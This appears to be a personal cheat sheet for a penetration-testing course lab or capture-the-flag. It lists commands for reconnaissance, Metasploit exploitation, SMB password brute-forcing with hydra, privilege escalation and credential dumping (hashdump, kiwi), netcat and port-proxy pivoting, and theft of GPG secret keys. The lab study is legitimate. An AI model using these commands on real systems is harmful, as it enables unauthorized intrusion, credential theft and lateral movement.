scanning:
dig @10.11.11.24 560gc.tgt -t AXFR

wget www.560gc.tgt

db_nmap -sS -Pn -n 10.11.11.14 -p 21,22,23,80,111,161,162,443,445,3389,5985,5986

auxiliary/scanner/smb/smb_version
auxiliary/scanner/ssh/ssh_version 
auxiliary/scanner/smb/smb_enumusers

nikto.pl -host http://10.10.10.10

-------------------------------------
scanning via pivot:
auxiliary/scanner/portscan/tcp
post/windows/gather/arp_scanner

-----------------------------

Exploit:

exploit/windows/smb/psexec
exploit/multi/script/web_delivery


smbclient \\\\ip\\ADMIN$ -U 560gc.tgt\\username -L


-----------------------------------------
passwords:
hydra -l monk -P /opt/john-latest/run/password.lst smb://10.10.10.10


-----------------------------------
Post:
getuid
getsystem
migrate to 64bit process
run hashdump
load kiwi
creds_all

----------------------------------------
ctf hints:

if you want to win the game remember to set the snaplen to 0
tcpdump -vnn -s 0  (will need to look at packet data

---------------------------------------
Pivot:
ssh sec560@10.10.75.14 -R8080:10.10.10.20:80

cd /tmp
mknod hootiebackpipe p
nc -v -l -p 4545 0<hootiebackpipe | nc 10.10.10.10 445 | tee hootiebackpipe

route add 10.10.10.20 255.255.255.255 3

netsh interface portproxy add v4tov4 listenport=4455 listenaddress=10.106.0.9 connectport=445 connectaddress=10.106.0.10 protocol=tcp

auxiliary/server/socks4a

------------------------------------------------
search for keys:
ls -latr /home/*/.gnupg

gpg --list-keys         #list public keys
gpg --list-secret-keys      #lists secret keys
gpg -d -o <outputfilename> <encrypted file name>

1.john
2.sam
3.lara
4.kim
